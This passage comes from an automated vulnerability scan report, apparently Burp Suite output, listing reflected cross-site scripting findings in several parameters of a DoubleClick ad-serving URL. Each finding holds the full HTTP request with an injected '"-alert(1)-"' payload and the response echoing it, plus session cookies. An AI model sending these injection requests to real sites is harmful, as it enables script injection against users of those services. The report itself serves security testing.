This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:51 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.54. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84e2"-alert(1)-"9a3c17528a7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:05 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.55. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d68"-alert(1)-"baa51e6d3e2 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:36 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.56. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c938b"-alert(1)-"d1206cc109e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:24 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.57. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eff5"-alert(1)-"d3279316554 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:15 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.58. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88246"-alert(1)-"34f3da19b89 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:38 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-11077488246"-alert(1)-"34f3da19b89&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.59. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 768d1"-alert(1)-"4d04f2c569 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml768d1"-alert(1)-"4d04f2c569&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
